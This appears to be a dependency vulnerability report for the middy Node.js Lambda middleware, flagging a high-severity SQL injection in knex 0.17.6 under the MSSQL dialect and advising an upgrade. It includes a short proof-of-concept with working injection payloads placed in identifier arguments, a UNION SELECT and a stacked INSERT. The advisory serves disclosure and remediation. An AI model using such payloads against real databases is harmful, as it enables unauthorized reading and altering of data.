middyjs/middy

🛵 The stylish Node.js middleware engine for AWS Lambda.
Vulnerabilities 1 via 1 paths
Dependencies 162
Source GitHub
Commit 846d48b0

high severity

SQL Injection

  • Vulnerable module: knex
  • Introduced through: knex@0.17.6

Detailed paths

  • Introduced through: middy@middyjs/middy#846d48b0276267a525366125969f224deb89f9cc › knex@0.17.6
    Remediation: Upgrade to knex@0.19.5.

Overview

knex is a query builder for PostgreSQL, MySQL and SQLite3.

Affected versions of this package are vulnerable to SQL Injection. Identifiers are escaped incorrectly in the MSSQL dialect, allowing attackers to craft a malicious query against the host DB.

Note: Knex is not vulnerable when using dialects other than MSSQL.

PoC

const knex = require('knex')({
  client: 'mssql',
  connection:{
    port: 1433,
    host: '127.0.0.1',
    password: 'yourStrong(!)Password',
    user: 'sa',
  },
});

(async () => {
  await knex.schema.createTableIfNotExists('projects', (table) => {
    table.increments();
    table.string('name');
  });
  console.log(await knex('projects').where('id] = 1 UNION SELECT 1, @@version -- --', 1));
  console.log(await knex('projects').where('id', 1)
    .orderBy('id]; INSERT INTO projects (name) VALUES (\'abc\'); -- --'));
})();

Remediation

Upgrade knex to version 0.19.5 or higher.
